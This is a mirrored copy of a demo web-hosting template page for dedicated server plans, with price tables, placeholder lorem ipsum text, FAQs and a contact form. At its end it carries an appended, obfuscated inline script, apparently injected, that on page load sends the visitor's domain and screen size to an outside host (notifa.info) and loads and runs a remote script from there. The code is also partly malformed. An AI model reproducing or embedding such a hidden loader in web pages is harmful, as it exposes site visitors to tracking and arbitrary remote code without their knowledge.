<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from rctheme.com/demo-html/prohost/dedicated-servers.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<!-- Mobile Meta -->
<meta name="viewport" content="width=device-width, initial-scale=1">

<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
<meta name="description" content="">
<meta name="author" content="">
<title>Dedicated Server</title>

<!-- Favicon -->
<link rel="icon" href="images/favicon.png">

<!-- Bootstrap core CSS -->
<link href="css/bootstrap.css" rel="stylesheet" media="all" />

<!-- Font Awesome CSS -->
<link rel="stylesheet" href="css/font-awesome.css" media="all" />

<!-- Main Template CSS -->
<link rel="stylesheet" href="css/style.css" media="all" />

<!-- Animation CSS -->
<link rel="stylesheet" href="css/animate.min.css" media="all" />
</head>

<body>
<!-- ========= Header Section Start ========= -->

<header>
  <div class="top_header">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link">
            <ul>
              <li>24x7 Live support</li>
              <li>+ 91 123 4567 890</li>
            </ul>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link right">
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="login.html">Login</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="main_menu">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-3 col-xs-12">
          <div class="logo"><a href="index-2.html"><img src="images/logo.png" alt="logo" title="logo" /></a></div>
        </div>
        <div class="col-md-9 col-sm-9 col-xs-12">
          <div class="navbar navbar-default" role="navigation">
            <div class="navbar-header">
              <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sronly">Menu</span> <i class="fa fa-bars" aria-hidden="true"></i></button>
            </div>
            <nav class="navbar navbar-default">
              <div id="navbar-collapse-1" class="collapse navbar-collapse">
                <ul class="nav navbar-nav">
                  <li><a href="index-2.html">Home</a></li>
                  <li><a href="#">Domain <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="register-domain.html">Register a Domain</a></li>
                      <li><a href="transfer-domain.html">Transfer Your Domain</a></li>
                      <li><a href="domain-price.html">Domain Price</a></li>
                      <li><a href="domain-promos.html">Domain Promos</a></li>
                    </ul>
                  </li>
                  <li class="active"><a href="#">Hosting <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="shared-hosting.html">Shared Hosting</a></li>
                      <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
                      <li><a href="dedicated-servers.html">Dedicated Servers</a></li>
                      <li><a href="vps.html">VPS Servers</a></li>
                      <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
                      <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Email <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="business-email.html">Business Email</a></li>
                      <li><a href="cloud-business-email.html">Cloud Business Email</a></li>
                      <li><a href="microsoft-office-365.html">Microsoft Office 365</a></li>
                      <li><a href="google-apps.html">Google Apps</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Security <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="ssl-security.html">SSL Security</a></li>
                      <li><a href="codeguard.html">Codeguard</a></li>
                    </ul>
                  </li>
                  <li><a href="bundled-offers.html">Bundle Offers</a></li>
                  <li><a href="support.html">Support</a></li>
                </ul>
              </div>
            </nav>
          </div>
        </div>
      </div>
    </div>
  </div>
</header>

<!-- ========= Header Section End ========= --> 

<!-- ========= Inner Page Banner Section Start ========= -->

<section class="page_banner">
  <div class="container">
    <div class="row">
      <div class="col-md-7 col-sm-7 col-xs-12">
        <h1>Dedicated Server</h1>
        <div class="sub_heading_page"><strong>Powerful Dedicated Hosting </strong> with Complete Root Access</div>
        <ul>
          <li>Instant Server Provisioning</li>
          <li>Full Root Access</li>
          <li>WHMCS Installation</li>
          <li>30 Day Money Back Guarantee</li>
        </ul>
        <div class="row">
          <div class="col-md-6 col-sm-12 col-xs-12">
            <div class="startsat">Starts at</div>
            <div class="banner_price">$2.42<span>/mo</span></div>
          </div>
          <div class="col-md-6 col-sm-12 col-xs-12"> <a class="primary_button" href="#">Buy Now</a> </div>
        </div>
      </div>
      <div class="col-md-5 col-sm-5 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
        <div class="offer">
          <div class="offer_inner">
            <div class="top_l">Mega mid-Year</div>
            <div class="big_l">Sale</div>
            <div class="off">upto 50% off</div>
            <div class="c_code">Use Coupon Code <span>'DSMEGASALE'</span></div>
            <div class="ends">Ends on 30 June 2017</div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Inner Page Banner Section End ========= --> 

<!-- ========= Prices Table Section Start ========= -->

<section class="price_table text_center">
  <div class="tabbable-panel">
    <div class="tabbable-line">
      <div class="tabs_l">
        <div class="container">
          <div class="row">
            <ul class="nav nav-tabs">
              <li class="active"><a data-toggle="tab" href="#tab_default_1">Linux</a></li>
              <li><a data-toggle="tab" href="#tab_default_2"> Windows</a></li>
            </ul>
          </div>
        </div>
      </div>
      <div class="container">
        <div class="row">
          <div class="tab-content">
            <div id="tab_default_1" class="tab-pane active">
              <div class="col-md-12 col-sm-12 col-xs-12">
                <div class="headings black_text">
                  <h6>Plan and Price</h6>
                  <h3>Linux Dedicated Server Plans</h3>
                  <div class="sep black_bg"></div>
                </div>
              </div>
              <div class="col-md-4 col-sm-4 col-xs-12">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Basic</div>
                    <div class="prices">$23.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li><strong>500 GB</strong> Disk Space</li>
                      <li><strong>100</strong> Databases List</li>
                      <li><strong>4 GB</strong> RAM</li>
                      <li><strong>Free</strong> Domain Registration</li>
                      <li><strong>5</strong> Hosting Space</li>
                      <li><strong>5</strong> Free IPs</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $23.00/month</option>
                      <option>4 years at $23.00/month</option>
                      <option>3 years at $23.00/month</option>
                      <option>2 years at $23.00/month</option>
                      <option>1 years at $23.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
              <div class="col-md-4 col-sm-4 col-xs-12">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Standard</div>
                    <div class="prices">$29.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li><strong>800 GB</strong> Disk Space</li>
                      <li><strong>200</strong> Databases List</li>
                      <li><strong>8 GB</strong> RAM</li>
                      <li><strong>Free</strong> Domain Registration</li>
                      <li><strong>10</strong> Hosting Space</li>
                      <li><strong>20</strong> Free IPs</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $29.00/month</option>
                      <option>4 years at $29.00/month</option>
                      <option>3 years at $29.00/month</option>
                      <option>2 years at $29.00/month</option>
                      <option>1 years at $29.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
              <div class="col-md-4 col-sm-4 col-xs-12">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Premium</div>
                    <div class="prices">$38.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li><strong>2 TB</strong> Disk Space</li>
                      <li><strong>300</strong> Databases List</li>
                      <li><strong>16 GB</strong> RAM</li>
                      <li><strong>Free</strong> Domain Registration</li>
                      <li><strong>20</strong> Hosting Space</li>
                      <li><strong>30</strong> Free IPs</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $38.00/month</option>
                      <option>4 years at $38.00/month</option>
                      <option>3 years at $38.00/month</option>
                      <option>2 years at $38.00/month</option>
                      <option>1 years at $38.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
            </div>
            <div id="tab_default_2" class="tab-pane">
              <div class="col-md-12 col-sm-12 col-xs-12">
                <div class="headings black_text">
                  <h6>Plan and Price</h6>
                  <h3>Windows Dedicated Server Plans</h3>
                  <div class="sep black_bg"></div>
                </div>
              </div>
              <div class="col-md-4 col-sm-4 col-xs-12">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Basic</div>
                    <div class="prices">$23.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li><strong>500 GB</strong> Disk Space</li>
                      <li><strong>100</strong> Databases List</li>
                      <li><strong>4 GB</strong> RAM</li>
                      <li><strong>Free</strong> Domain Registration</li>
                      <li><strong>5</strong> Hosting Space</li>
                      <li><strong>5</strong> Free IPs</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $23.00/month</option>
                      <option>4 years at $23.00/month</option>
                      <option>3 years at $23.00/month</option>
                      <option>2 years at $23.00/month</option>
                      <option>1 years at $23.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
              <div class="col-md-4 col-sm-4 col-xs-12">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Standard</div>
                    <div class="prices">$29.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li><strong>800 GB</strong> Disk Space</li>
                      <li><strong>200</strong> Databases List</li>
                      <li><strong>8 GB</strong> RAM</li>
                      <li><strong>Free</strong> Domain Registration</li>
                      <li><strong>10</strong> Hosting Space</li>
                      <li><strong>20</strong> Free IPs</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $29.00/month</option>
                      <option>4 years at $29.00/month</option>
                      <option>3 years at $29.00/month</option>
                      <option>2 years at $29.00/month</option>
                      <option>1 years at $29.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
              <div class="col-md-4 col-sm-4 col-xs-12">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Premium</div>
                    <div class="prices">$38.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li><strong>2 TB</strong> Disk Space</li>
                      <li><strong>300</strong> Databases List</li>
                      <li><strong>16 GB</strong> RAM</li>
                      <li><strong>Free</strong> Domain Registration</li>
                      <li><strong>20</strong> Hosting Space</li>
                      <li><strong>30</strong> Free IPs</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $38.00/month</option>
                      <option>4 years at $38.00/month</option>
                      <option>3 years at $38.00/month</option>
                      <option>2 years at $38.00/month</option>
                      <option>1 years at $38.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Prices Table Section End ========= --> 

<!-- ========= What We Do Section Start ========= -->

<section class="what_we_do text_center white_text">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings white_text">
          <h6>include all</h6>
          <h3>What We Do</h3>
          <div class="sep white_bg"></div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 whatwedo wow fadeInUp" data-wow-duration=".3" data-wow-delay=".1s"><i class="fa fa-comments what-icon"></i>
        <h5 class="section_sub_heading">24/7 Support</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 whatwedo wow fadeInUp" data-wow-duration=".3" data-wow-delay=".2s"><i class="fa fa-code what-icon"></i>
        <h5 class="section_sub_heading">Included Apps</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 whatwedo wow fadeInUp" data-wow-duration=".3" data-wow-delay=".3s"><i class="fa fa-clock-o what-icon"></i>
        <h5 class="section_sub_heading">Total security</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 whatwedo wow fadeInUp" data-wow-duration=".3" data-wow-delay=".4s"><i class="fa fa-tachometer what-icon"></i>
        <h5 class="section_sub_heading">100% uptime</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
    </div>
  </div>
</section>

<!-- ========= What We Do Section End ========= --> 

<!-- ========= Server Features Section Start ========= -->

<section class="server_features text_center">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings black_text">
          <h6>Curabitur vitae</h6>
          <h3>Server Features</h3>
          <div class="sep black_bg"></div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".1s">
        <div class="server_features_box"> <i class="fa fa-rocket"></i>
          <h5 class="section_sub_heading">Get Online Faster</h5>
          <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          <div class="clear"></div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".2s">
        <div class="server_features_box"> <i class="fa fa-history"></i>
          <h5 class="section_sub_heading">Reliable Infrastructure</h5>
          <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          <div class="clear"></div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".3s">
        <div class="server_features_box"> <i class="fa fa-shopping-cart"></i>
          <h5 class="section_sub_heading">Ecommerce Support</h5>
          <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          <div class="clear"></div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".4s">
        <div class="server_features_box"> <i class="fa fa-shield"></i>
          <h5 class="section_sub_heading">Safety and Security</h5>
          <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          <div class="clear"></div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Server Features Section End ========= --> 

<!-- ========= FAQs Section Start ========= -->

<section class="accordian_main">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings white_text">
          <h6>About the Domain</h6>
          <h3>Frequently Asked Questions</h3>
          <div class="sep white_bg"></div>
        </div>
      </div>
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="accordion">
          <div class="accordion-section"><a class="accordion-section-title" href="#accordion-1">What kind of web hosting do I need?</a>
            <div id="accordion-1" class="accordion-section-content">
              <p>Mauris interdum fringilla augue vitae tincidunt. Curabitur vitae tortor id eros euismod ultrices. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Praesent nulla mi, rutrum ut feugiat at, vestibulum ut neque? Cras tincidunt enim vel aliquet facilisis. Duis congue ullamcorper vehicula. Proin nunc lacus, semper sit amet elit sit amet, aliquet pulvinar erat. Nunc pretium quis sapien eu rhoncus. Suspendisse ornare gravida mi, et placerat tellus tempor vitae.</p>
            </div>
          </div>
          <div class="accordion-section"><a class="accordion-section-title active" href="#accordion-2">What kind of web hosting do I need? </a>
            <div id="accordion-2" class="accordion-section-content open">
              <p>Mauris interdum fringilla augue vitae tincidunt. Curabitur vitae tortor id eros euismod ultrices. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Praesent nulla mi, rutrum ut feugiat at, vestibulum ut neque? Cras tincidunt enim vel aliquet facilisis. Duis congue ullamcorper vehicula. Proin nunc lacus, semper sit amet elit sit amet, aliquet pulvinar erat. Nunc pretium quis sapien eu rhoncus. Suspendisse ornare gravida mi, et placerat tellus tempor vitae.</p>
            </div>
          </div>
          <div class="accordion-section"><a class="accordion-section-title" href="#accordion-3">What kind of web hosting do I need? </a>
            <div id="accordion-3" class="accordion-section-content">
              <p>Mauris interdum fringilla augue vitae tincidunt. Curabitur vitae tortor id eros euismod ultrices. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Praesent nulla mi, rutrum ut feugiat at, vestibulum ut neque? Cras tincidunt enim vel aliquet facilisis. Duis congue ullamcorper vehicula. Proin nunc lacus, semper sit amet elit sit amet, aliquet pulvinar erat. Nunc pretium quis sapien eu rhoncus. Suspendisse ornare gravida mi, et placerat tellus tempor vitae.</p>
            </div>
          </div>
          <div class="accordion-section"><a class="accordion-section-title" href="#accordion-4">What kind of web hosting do I need? </a>
            <div id="accordion-4" class="accordion-section-content">
              <p>Mauris interdum fringilla augue vitae tincidunt. Curabitur vitae tortor id eros euismod ultrices. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Praesent nulla mi, rutrum ut feugiat at, vestibulum ut neque? Cras tincidunt enim vel aliquet facilisis. Duis congue ullamcorper vehicula. Proin nunc lacus, semper sit amet elit sit amet, aliquet pulvinar erat. Nunc pretium quis sapien eu rhoncus. Suspendisse ornare gravida mi, et placerat tellus tempor vitae.</p>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= FAQs Section End ========= --> 

<!-- ========= Call Back Form Section Start ========= -->

<section class="call_back_main text_center">
  <div class="container">
    <div class="col-md-6 col-sm-6 col-xs-12">
      <div class="headings black_text">
        <h6>Contact Us</h6>
        <h3>Get a Call Back</h3>
        <div class="sep black_bg"></div>
      </div>
      <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the ndustry's standard dummy text ever since the 1500s, when an unknown printer took. </p>
    </div>
    <div class="col-md-6 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
      <div class="form_outer">
        <form>
          <input type="text" name="name" class="name" placeholder="Name" required="">
          <input type="text" name="phone" class="name" placeholder="Contact Number" required="">
          <input type="email" name="email" class="name" placeholder="Email" required="">
          <input type="submit" name="submit" class="primary_button" value="Send Now">
        </form>
      </div>
    </div>
  </div>
</section>

<!-- ========= Call Back Form Section End ========= --> 

<!-- ========= Footer Section Start ========= -->

<footer class="footer">
  <div class="f_outr_section">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>About Us</h4>
            <div class="f_about">
              <p>Lorem ipsum dolor sit amet dolor sit elit Suspendisse et justo et justo sit Praesent mattis commodo augue Aliquam ornare. Lorem ipsum dolor sit amet dolor sit elit. Lorem ipsum dolor sit amet dolor sit elit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Quick Links</h4>
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="support.html">Support</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="bundled-offers.html">Bundle Offers</a></li>
              <li><a href="login.html">Login</a></li>
              <li><a href="404.html">404 Page</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Our Services</h4>
            <ul>
              <li><a href="shared-hosting.html">Shared Hosting</a></li>
              <li><a href="vps.html">Virtual Private Server</a></li>
              <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
              <li><a href="dedicated-servers.html">Dedicated Server</a></li>
              <li><a href="ssl-security.html">SSL Certificated</a></li>
              <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
              <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading ">
            <h4>Contact Us</h4>
            <div class="f_contact_s">
              <div class="f-con-head">Address:-
                <p>Lorem ipsum dolor<br>
                  amet dolor sit elit Suspendisse</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Contact:-
                <p>Ph: (+000) 1234 5678<br>
                  Fax: (+000) 1234 5678</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Email:-
                <p><a href="mailto:info@yourdomain.com">info@yourdomain.com</a><br>
                  <a href="mailto:sales@yourdomain.com">sales@yourdomain.com</a></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="footer-bottom">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="news_letr">
            <form>
              <input type="text" placeholder="Enter your Email" class="nwesltr">
              <input type="submit" class="secondry_button join_now" value="Join Now">
            </form>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="social">
            <ul>
              <li><a href="#"><i class="fa fa-facebook"></i></a></li>
              <li><a href="#"><i class="fa fa-google"></i></a></li>
              <li><a href="#"><i class="fa fa-twitter"></i></a></li>
              <li><a href="#"><i class="fa fa-linkedin"></i></a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="copy-right">
    <div class="container">
      <div class="row">
        <div class="col-md-12 col-sm-12 col-xs-12">Copyright © 2015 - 2017 prohost. All Rights Reserved.</div>
      </div>
    </div>
  </div>
</footer>

<!-- ========= Footer Section End ========= --> 

<!-- Bootstrap core JavaScript --> 
<script type="text/javascript" src="js/jquery.min.js"></script> 
<script type="text/javascript" src="js/bootstrap.min.js"></script> 

<!-- Animation JavaScript --> 
<script type="text/javascript" src="js/jquery.wow.min.js" ></script> 
<script type="text/javascript" src="js/wow.min.js" ></script> 

<!-- Custom Template JavaScript --> 
<script type="text/javascript" src="js/custom.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m834VngSV4X6H1IvEreyHRMda6FvV21GK0sTNfAXkcJT5HaO63Ov7VTCcyFXdojI2cDCfm97t%2bMRx4%2fDXgvfnmGjTAbSbmvxQRJu%2bgfI29Hp89%2fWkuOjEKcQuE9BJcTNP7ICIcM1is7ACMX9up53r44ko0G8%2bV%2f86PZYsw%2bbgm08ENslfnWx5Lc5MsVsQ55hPkIyNNeUEj2dvpyBbS7QTpwtOJs1O6o7lz8fPBEXPQnkEvodeTaUnfCDfD0%2fSnlxKDy5Nwqjtw3iq2bPJkmwIG4TkgbFudNk44vjd8Z2dfxP9wM5Ws4EnZYRcB6pMVje7F6RnaSBXc4JTtv18KdFAKXqpM8HqWSOMyJIU38RDlyVe15RXvr2rip%2bKXu5H%2feYg%2fU5b04EkY7CHoj%2bYyUDgb86mxvfOcwFXYyTfRHjSCBsoFchnYGB4p6uFv%2fww4nVkq8xKJajVK%2fQA%2fGl4LaiFEYez1FgR9tu%2b98XpsxRZRja80ZFVYs%2bTrQawcYVwdZRN + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from rctheme.com/demo-html/prohost/dedicated-servers.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
</html>